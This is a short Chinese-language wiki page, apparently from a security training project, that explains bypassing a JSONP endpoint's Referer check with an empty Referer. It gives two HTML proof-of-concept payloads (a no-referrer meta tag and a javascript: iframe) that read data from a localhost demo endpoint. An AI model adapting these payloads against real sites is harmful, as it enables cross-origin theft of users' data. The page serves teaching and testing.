Skip to content
JoyChou edited this page Jan 29, 2019 · 8 revisions

有时候开发同学为了测试方便,JSONP接口能直接访问,不直接访问做了Referer限制。正常来讲,前端发起的请求默认都会带着Referer,所以简单说下如何绕过空Referer。

Poc 1

<html>
<meta name="referrer" content="no-referrer" />

<script>
	function test(data){
		alert(data.name);
	}
</script>
<script src=http://localhost:8080/jsonp/emptyReferer?callback=test></script>
</html>

Poc2

<iframe src="javascript:'<script>function test(data){alert(data.name);}</script><script src=http://localhost:8080/jsonp/emptyReferer?callback=test></script>'"></iframe>

Reference

Clone this wiki locally